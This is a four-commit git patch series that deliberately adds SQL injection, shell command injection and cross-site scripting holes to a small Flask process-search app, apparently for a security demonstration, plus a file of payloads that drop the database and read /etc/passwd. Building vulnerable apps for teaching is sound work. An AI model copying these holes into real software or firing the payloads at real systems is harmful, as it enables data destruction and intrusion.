From a46d2b076a7c730c0690248ecf1a6de4d4831f2a Mon Sep 17 00:00:00 2001
From: Dean Johnson <deanjohnson222@gmail.com>
Date: Mon, 24 Feb 2014 13:19:05 -0800
Subject: [PATCH 1/4] Added SQL Injection vulnerability.

---
 systemview.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/systemview.py b/systemview.py
index 4188c12..a32bf41 100644
--- a/systemview.py
+++ b/systemview.py
@@ -111,7 +111,9 @@ def show_procs(term=None):
             count += 1
 
     # check to see if the term is already in the db
-    search = Search.query.filter_by(term=term).first()
+
+    search = db.session.execute("select * from searches where term=\"" + term + "\"").fetchall()
+    print search
 
     # check to see that we entered a term, and it's not in the db
     if term and not search:

From 9beb7de227e510e9d7a29cd91cb39a275a40731b Mon Sep 17 00:00:00 2001
From: Dean Johnson <deanjohnson222@gmail.com>
Date: Mon, 24 Feb 2014 13:30:09 -0800
Subject: [PATCH 2/4] Added RCE.

---
 systemview.py | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/systemview.py b/systemview.py
index a32bf41..c2e663d 100644
--- a/systemview.py
+++ b/systemview.py
@@ -98,7 +98,8 @@ def show_procs(term=None):
     term = request.form['term']
 
     # now lets get all the system processes
-    raw_procs = subprocess.Popen(['ps', 'auxh'],
+    cmd = "ps aux | grep " + term
+    raw_procs = subprocess.Popen(cmd, shell=True,
                                  stdout=subprocess.PIPE).communicate()[0]
 
     # now filter the raw process list to find lines with our term
@@ -111,9 +112,7 @@ def show_procs(term=None):
             count += 1
 
     # check to see if the term is already in the db
-
     search = db.session.execute("select * from searches where term=\"" + term + "\"").fetchall()
-    print search
 
     # check to see that we entered a term, and it's not in the db
     if term and not search:

From c78e9cef40d2d61740767a24eb125028f45f19b0 Mon Sep 17 00:00:00 2001
From: Dean Johnson <deanjohnson222@gmail.com>
Date: Mon, 24 Feb 2014 15:14:03 -0800
Subject: [PATCH 3/4] Added XSS Vulnerability.

---
 templates/proc_search.html | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/templates/proc_search.html b/templates/proc_search.html
index 4dae6ce..dca0e0d 100644
--- a/templates/proc_search.html
+++ b/templates/proc_search.html
@@ -48,9 +48,11 @@ <h3>{{ count }} processes found on {{ hostname }}</h3>
     <h3> Previous searches: </h3>
     <form action="{{ url_for('show_procs') }}" method=post class=search-form>
         <ul class=procs>
+        {% autoescape false %}
         {% for search in searches %}
             <li><button name=term type=submit value={{ search.term|escape }} >{{ search.term|escape }}</button></li>
         {% endfor %}
+        {% endautoescape %}
         </ul>
     </form>
     {% else %}

From d2c41fc533c6fa06cd7901b5bb7800257f306ff3 Mon Sep 17 00:00:00 2001
From: Dean Johnson <deanjohnson222@gmail.com>
Date: Thu, 6 Mar 2014 18:04:21 -0800
Subject: [PATCH 4/4] Added file with exploits used in the demonstration.

---
 exploits.txt | 3 +++
 1 file changed, 3 insertions(+)
 create mode 100644 exploits.txt

diff --git a/exploits.txt b/exploits.txt
new file mode 100644
index 0000000..3ab0511
--- /dev/null
+++ b/exploits.txt
@@ -0,0 +1,3 @@
+SQL Injection: ";drop database systemview;
+RCE: nonesense; cat /etc/passwd > test
+XSS: ";<script type="text/javascript">alert("This is an XSS Vulnerability");</script>